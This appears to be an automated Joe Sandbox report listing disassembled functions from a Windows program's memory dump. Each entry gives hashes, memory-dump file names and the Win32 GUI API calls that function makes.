API String ID: 2914356772-0
Opcode ID: 642a57da10c01bc09f883578a6a4d59df57378fd474cc843870ad5d4373bc19b
Instruction ID: 716282c255749bc49fabcd43f98162a2190cc0d2e37b60b48197ed6ffaa2a846
Opcode Fuzzy Hash: 642a57da10c01bc09f883578a6a4d59df57378fd474cc843870ad5d4373bc19b
Instruction Fuzzy Hash: A781B2706007089FCB25AF648884ABEB7F6FF88700B2405BEE605DB256DF719C85DB61

Function 00C4C085 Relevance: 9.2, APIs: 6, Instructions: 222windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C4C1AB
SendMessageA.USER32(?,0000001F,00000000,00000000), ref: 00C4C1E3
IsWindow.USER32(?), ref: 00C4C208
SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00C4C32D
InvalidateRect.USER32(?,00000000,00000001), ref: 00C4C384
UpdateWindow.USER32(?), ref: 00C4C38D

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$MessageRectSend$InvalidateUpdate
String ID:
API String ID: 1016537255-0
Opcode ID: b59cb841c033d6d68db8ef3148c27be0a9f9e1809eff76155f066932b0639bad
Instruction ID: 1ac48538c3268f5ae5aa1d15556a0233bcf26b370eb2dd2a213c069441387d3b
Opcode Fuzzy Hash: b59cb841c033d6d68db8ef3148c27be0a9f9e1809eff76155f066932b0639bad
Instruction Fuzzy Hash: EA913030641B05DFCB71CF65C9C4AAAB7F1FF54341F24892AE4AA97271E770A940DB11

Function 00C18EC4 Relevance: 9.2, APIs: 6, Instructions: 221COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00C18EF6

Part of subcall function 00BE2429: GetWindowLongA.USER32(?,000000EC), ref: 00BE2434

GetWindowRect.USER32(?,?), ref: 00C18FF1
GetParent.USER32(?), ref: 00C18FFE
GetParent.USER32(?), ref: 00C19018
OffsetRect.USER32(?,?,?), ref: 00C190E5
OffsetRect.USER32(?,?,?), ref: 00C190F1

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Window$OffsetParent$Long
String ID:
API String ID: 2171155602-0
Opcode ID: d54f7ac06d3f2784ea944f72e7b8eed3e21af5102f1b973bb3fe1bf825b0f7a3
Instruction ID: b23648758d7f45b40e1516a0076fb067bbfe8970124041a550369f21377e8937
Opcode Fuzzy Hash: d54f7ac06d3f2784ea944f72e7b8eed3e21af5102f1b973bb3fe1bf825b0f7a3
Instruction Fuzzy Hash: 7991EF71D00209EFCF15DFA8C998AEEBBF5FF49300F24446AE915A7250DB356A81DB60

Function 00C1FA37 Relevance: 9.2, APIs: 6, Instructions: 177windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C1FA3E
GetClientRect.USER32(?,?), ref: 00C1FA84

Part of subcall function 00BD82B9: __EH_prolog3.LIBCMT ref: 00BD82C0
Part of subcall function 00BD82B9: GetDC.USER32(00000000), ref: 00BD82EC

Part of subcall function 00BD8606: SelectObject.GDI32(?,00000000), ref: 00BD862C
Part of subcall function 00BD8606: SelectObject.GDI32(?,?), ref: 00BD8642

SendMessageA.USER32(?,00000030,?,00000000), ref: 00C1FAD5
GetTextMetricsA.GDI32(?,?), ref: 00C1FAE2
GetParent.USER32(?), ref: 00C1FBC7
SendMessageA.USER32(?,00000030,?,00000000), ref: 00C1FBF2

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageObjectSelectSend$ClientH_prolog3H_prolog3_MetricsParentRectText
String ID:
API String ID: 1207058154-0
Opcode ID: 369f3c4ace1e0d523c1b9ae2c47da1450ae42c370e1df85de5c380cb06d01e89
Instruction ID: cb3ddf5a722b22a821deba4392db4574a70eacacea95dd936ea2c41f474b2b7b
Opcode Fuzzy Hash: 369f3c4ace1e0d523c1b9ae2c47da1450ae42c370e1df85de5c380cb06d01e89
Instruction Fuzzy Hash: E051AD329002159FCF25DFA8C991AEEB7B5FF48300F154279ED1AAB255DB30AD42DB50

Function 00BEDAC8 Relevance: 9.2, APIs: 6, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f799765d2f41abd602a4aa73855103772c6079fc97dacc201e6f4059874bdbc2
Instruction ID: 71cff8863f2b6b163c7aca6ccac8ceaaa65000b3916a418f51523b84e40cda89
Opcode Fuzzy Hash: f799765d2f41abd602a4aa73855103772c6079fc97dacc201e6f4059874bdbc2
Instruction Fuzzy Hash: DA518F30200641AFDB24AF75C898F6A77E9FF48340F1145A9F956DB2A1EBB0ED40CB50

Function 00BF10EA Relevance: 9.2, APIs: 6, Instructions: 155windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 00BF1163
SendMessageA.USER32(00000000,0000040C,00000000,00000000), ref: 00BF11A2
SendMessageA.USER32(00000000,0000041D,00000000,?), ref: 00BF11D1
SetRectEmpty.USER32(?), ref: 00BF122B
SendMessageA.USER32(00000000,00000406,00000000,?), ref: 00BF1291
RedrawWindow.USER32(00000000,00000000,00000000,00000505), ref: 00BF12B7

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$EmptyParentRectRedrawWindow
String ID:
API String ID: 3879113052-0
Opcode ID: d0cb08c765002fe80bd50db34d7206894f78761e7accad803faaa86d3047a8d4
Instruction ID: dd4713e4fed3cebf03805d9f392d344c5ec7de6f63697608b0d99361b15beabe
Opcode Fuzzy Hash: d0cb08c765002fe80bd50db34d7206894f78761e7accad803faaa86d3047a8d4
Instruction Fuzzy Hash: B8512D71A00609DFDB20DFA8C884BADB7F5FF48700F2049A9E655E7251EB719944CF41

Function 00BD5AA8 Relevance: 9.1, APIs: 6, Instructions: 138COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00BD5AAF
GlobalLock.KERNEL32(?), ref: 00BD5B90
CreateDialogIndirectParamA.USER32(?,?,?,00BD5405,00000000), ref: 00BD5BBF
DestroyWindow.USER32(00000000), ref: 00BD5C39
GlobalUnlock.KERNEL32(?), ref: 00BD5C49
GlobalFree.KERNEL32(?), ref: 00BD5C52

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
String ID:
API String ID: 3003189058-0
Opcode ID: 92624a61ab7a0806e94862e81f03fd8239fa40e1ae99644ec7ab610995b82332
Instruction ID: ec0f50bc03d6b2ec5fbb35df1716166385223f7fb6cfd9abce328196484fab5f
Opcode Fuzzy Hash: 92624a61ab7a0806e94862e81f03fd8239fa40e1ae99644ec7ab610995b82332
Instruction Fuzzy Hash: BB519231500689DFCF20EFA4C8859AEBBF5EF54310F1505AEF502A73A1EB709945DB61

Function 00C239B5 Relevance: 9.1, APIs: 6, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00C23A14
SendMessageA.USER32(?,00001204,00000000,00000001), ref: 00C23A56
SendMessageA.USER32(?,00001204,00000001,00000001), ref: 00C23A78
SendMessageA.USER32(?,00000201,00000000,00000000), ref: 00C23AF2
SendMessageA.USER32(?,00000202,00000000,00000000), ref: 00C23B0A
PtInRect.USER32(?,?,?), ref: 00C23B26

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MessageSend$Rect$Client
String ID:
API String ID: 4194289498-0
Opcode ID: 4dd986dbca16de8475c09978b3517d5cdec4251d13f1d2abc32262368deabc8d
Instruction ID: dc8efbeadb1fa53c9c12c49928aab4f3dd0040b8cfba68f18d73c605099c5493
Opcode Fuzzy Hash: 4dd986dbca16de8475c09978b3517d5cdec4251d13f1d2abc32262368deabc8d
Instruction Fuzzy Hash: 95514B71900269DFCB11DF64C888E9E7BB9FF49710F1441B9E809AF215CB75AA41DBA0

Function 00C2C746 Relevance: 9.1, APIs: 6, Instructions: 125COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 00C2C7FF
InflateRect.USER32(?,000000FF,000000FF), ref: 00C2C830
InflateRect.USER32(?,000000FF,000000FF), ref: 00C2C85F
InflateRect.USER32(?,000000FF,000000FF), ref: 00C2C881

Part of subcall function 00BEAECF: __EH_prolog3.LIBCMT ref: 00BEAED6

InflateRect.USER32(?,000000FE,000000FE), ref: 00C2C88E
InflateRect.USER32(?,000000FE,000000FE), ref: 00C2C8C1

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: InflateRect$H_prolog3
String ID:
API String ID: 3346915232-0
Opcode ID: a083dbd6831cc4a84c22e7f3d7db72da1569aeffcf029a7eddaab47229215479
Instruction ID: 8e7b01341ec48a95ba42e53fdd1babe4382fcf596291858fa0bc55e736434744
Opcode Fuzzy Hash: a083dbd6831cc4a84c22e7f3d7db72da1569aeffcf029a7eddaab47229215479
Instruction Fuzzy Hash: DF41A431404324EFCF129F14ED80AAD3BA6EB86370F248365F8745A6E5DB319A40DB51

Function 00C3C6EF Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

IsMenu.USER32(?), ref: 00C3C720
GetMenuDefaultItem.USER32(?,00000000,00000001), ref: 00C3C746
GetMenuItemCount.USER32(?), ref: 00C3C752
GetMenuItemID.USER32(?,?), ref: 00C3C77B
GetSubMenu.USER32(?,?), ref: 00C3C7C6
GetMenuState.USER32(?,?,00000400), ref: 00C3C800

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Menu$Item$CountDefaultState
String ID:
API String ID: 170603052-0
Opcode ID: f1b42f3cd9be604c8250c96b97a05d80da0fa47fa8e73377681e8fb5871717f7
Instruction ID: bb1da57fd28852b793c76740e9a130fa1872ff090d7f200b93f174d79809b25c
Opcode Fuzzy Hash: f1b42f3cd9be604c8250c96b97a05d80da0fa47fa8e73377681e8fb5871717f7
Instruction Fuzzy Hash: 34414C75600204EFCF25AF60C9C9AADBBB5FF49740F108569F916AB2A1D730EA41DF90

Function 00C2D1CD Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetClientRect.USER32(?,?), ref: 00C2D22C
PtInRect.USER32(?,?,?), ref: 00C2D23C
SetCapture.USER32(?), ref: 00C2D286
ReleaseCapture.USER32 ref: 00C2D2CD
InvalidateRect.USER32(?,00000000,00000001), ref: 00C2D2E6
UpdateWindow.USER32(?), ref: 00C2D2EF

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$Capture$ClientInvalidateReleaseUpdateWindow
String ID:
API String ID: 4118727484-0
Opcode ID: bdf5730d12fb1367aa0ef4ecc56372ff283c43bc3ef848c8ac5edb9573d25301
Instruction ID: 7ebfffce197fdb7b7eaf43b877739580cdc067ab3a4d41c5e838ba1dd12e187d
Opcode Fuzzy Hash: bdf5730d12fb1367aa0ef4ecc56372ff283c43bc3ef848c8ac5edb9573d25301
Instruction Fuzzy Hash: E741E775900B19DFCB21DFA5D8807ABFBF4FBA6341F20492ED0AA96510D730AA40CF52

Function 00BF5916 Relevance: 9.1, APIs: 6, Instructions: 95windowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00BF5947
OffsetRect.USER32(?,?,?), ref: 00BF5965
SendMessageA.USER32(00000000,0000000B,00000000,00000000), ref: 00BF5972
IsWindowVisible.USER32(?), ref: 00BF597B
SendMessageA.USER32(00000014,0000000B,00000001,00000000), ref: 00BF59EE
RedrawWindow.USER32(00000105,00000000,00000000,00000105), ref: 00BF59FE

Part of subcall function 00BE25F8: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,00BDE5B3,?,00BDE5B3,00000000,?,?,000000FF,000000FF,00000015), ref: 00BE2620

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Window$MessageRectSend$OffsetRedrawVisible
String ID:
API String ID: 2707749077-0
Opcode ID: c1b92c4d776a4dc6f85f5b402382b5ea0dd637a67b7a6a0a708f40f85e49e822
Instruction ID: c09bd2bd451dfe1abfbdcaf8b50d71eda39e7404827c1dc5184f6e9461f1b0f7
Opcode Fuzzy Hash: c1b92c4d776a4dc6f85f5b402382b5ea0dd637a67b7a6a0a708f40f85e49e822
Instruction Fuzzy Hash: 49310EB1900249AFDB11DFA8CD89EBFBBFDFB08740F100559F656A6190DB70AD009B21

Function 00C4C4F9 Relevance: 9.1, APIs: 6, Instructions: 89windowCOMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32(00000002), ref: 00C4C51C
GetSystemMetrics.USER32(00000015), ref: 00C4C52A
GetSystemMetrics.USER32(00000015), ref: 00C4C549
SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 00C4C5A3
SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 00C4C5CC
RedrawWindow.USER32(?,00000000,00000000,00000585), ref: 00C4C5D8

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MetricsSystem$MessageSend$RedrawWindow
String ID:
API String ID: 1898417864-0
Opcode ID: 2c80da7af7719e61157ea291989bc3d5c158568e2166b819fbb1f8575c8c8d00
Instruction ID: eb684fb7b306308ba47578590beef6cd310fbd2ed19c5a3a83aec3b9773b071c
Opcode Fuzzy Hash: 2c80da7af7719e61157ea291989bc3d5c158568e2166b819fbb1f8575c8c8d00
Instruction Fuzzy Hash: F9315E31200B04AFD7619B79CCC8BAEB7E5FFC8710F14492DE5AACB261DA71A901DB50

Function 00C24951 Relevance: 9.1, APIs: 6, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,00001203,00000000,00000001), ref: 00C249A0
GetClientRect.USER32(?,?), ref: 00C249B9
GetSystemMetrics.USER32(00000015), ref: 00C249E4
GetSystemMetrics.USER32(00000015), ref: 00C24A0C
InvalidateRect.USER32(?,?,00000001), ref: 00C24A2C
UpdateWindow.USER32(?), ref: 00C24A35

Part of subcall function 00BD71ED: __CxxThrowException@8.LIBCMT ref: 00BD7203
Part of subcall function 00BD71ED: __EH_prolog3.LIBCMT ref: 00BD7210

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: MetricsRectSystem$ClientException@8H_prolog3InvalidateMessageSendThrowUpdateWindow
String ID:
API String ID: 1842141341-0
Opcode ID: 6c28039f4d240ad739e19f5374f0c3271a0ee530eda18fe494e686fec45007ef
Instruction ID: 0cb73387027149f979278857979461457101619d8639afc20768148994fe25a7
Opcode Fuzzy Hash: 6c28039f4d240ad739e19f5374f0c3271a0ee530eda18fe494e686fec45007ef
Instruction Fuzzy Hash: 88317072A00608DFCB10DFB9C884AAEBBF9FF88350F11411AE155A7260DB70AA41DF91

Function 00C2F7BE Relevance: 9.1, APIs: 6, Instructions: 82windowCOMMON

Download Yara Rule

APIs

PatBlt.GDI32(00000000,00000000,00C123B5,000000C6,00FF0062,00000000), ref: 00C2F7E5
SetBkColor.GDI32(00F0F0F0), ref: 00C2F808
BitBlt.GDI32(00000000,00000000,00C123B7,000000C8,00000000,00000000,00CC0020), ref: 00C2F836
SetBkColor.GDI32 ref: 00C2F849
BitBlt.GDI32(00000000,00000000,00C123B7,000000C8,00000000,00000000,00EE0086), ref: 00C2F871
BitBlt.GDI32(01010EAE,00000001,00000001,00C123B8,000000C9,01010EAE,00000000,00000000,008800C6), ref: 00C2F894

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Color
String ID:
API String ID: 2811717613-0
Opcode ID: 7150a9840bf0ffbd834a3845355ec65c5e9fc18bd2f84290be30ae719ebf417e
Instruction ID: 75670d0da6fe6178831316d7deea600ccfeb97993dae6ffd6afcbdf1e85d67b5
Opcode Fuzzy Hash: 7150a9840bf0ffbd834a3845355ec65c5e9fc18bd2f84290be30ae719ebf417e
Instruction Fuzzy Hash: B52157B6600708BFEB248F94EC85E3777AEFB493987004528F516C26A0C7B5BC01DB20

Function 00BF6BF9 Relevance: 9.1, APIs: 6, Instructions: 79timeCOMMON

Download Yara Rule

APIs

PtInRect.USER32(?,?,?), ref: 00BF6C19
ReleaseCapture.USER32 ref: 00BF6C27
PtInRect.USER32(?,?,?), ref: 00BF6C79
InvalidateRect.USER32(?,?,00000001), ref: 00BF6CC7
SetTimer.USER32(?,00000002,00000050,00000000), ref: 00BF6CE9

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Rect$CaptureInvalidateReleaseTimer
String ID:
API String ID: 2903485716-0
Opcode ID: 9bcad66adec8929dad6a92cede1f5d119eb3d0230994296e099cf5acd1df9343
Instruction ID: be17cad3904278abffaca071b2be0ac819accef3d1906895d443c1270084ed1c
Opcode Fuzzy Hash: 9bcad66adec8929dad6a92cede1f5d119eb3d0230994296e099cf5acd1df9343
Instruction Fuzzy Hash: BF213C3110064AEFCB719F60CC84FBA7BE9FF44391F14086AEAE687190DB31A955EB51

Function 00C32621 Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000002,?,?,?,?,?,00C3276A,00000000,00000000,?,?,00C345A6,?,?,?,00000084), ref: 00C32631
GlobalLock.KERNEL32(00000000), ref: 00C32649
_memmove.LIBCMT ref: 00C32656
CreateStreamOnHGlobal.OLE32(00000000,00000000,00000000,?), ref: 00C32665
EnterCriticalSection.KERNEL32(00D3420C,00000000), ref: 00C3267E
LeaveCriticalSection.KERNEL32(00D3420C), ref: 00C326E5

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.3119675720.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119784222.0000000000CEA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D2B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119823296.0000000000D32000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3119863546.0000000000D38000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_1.jbxd

Similarity

API ID: Global$CriticalSection$AllocCreateEnterLeaveLockStream_memmove
String ID:
API String ID: 861836607-0
Opcode ID: c099a37c3a6979f1bb87b3fc544ec6dbd5f6f693acee402e55c0fcd3f54c4320
Instruction ID: 5b007189a71a15d4744dfb1bb6a32e4249fe915198535df5db298c9b0651316c
Opcode Fuzzy Hash: c099a37c3a6979f1bb87b3fc544ec6dbd5f6f693acee402e55c0fcd3f54c4320
Instruction Fuzzy Hash: BC218C75610301AFDF10ABA1DC5AB5E7BF8EF24750F000069F802D63A2EB74EE40DAA1

Function 00BD6047 Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 00BD607A
GetParent.USER32(?), ref: 00BD6088
GetParent.USER32(?), ref: 00BD609B
GetLastActivePopup.USER32(?), ref: 00BD60AC
IsWindowEnabled.USER32(?), ref: 00BD60C0
EnableWindow.USER32(?,00000000), ref: 00BD60D3

Memory Dump Source

Source File: 00000000.00000002.3119698623.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

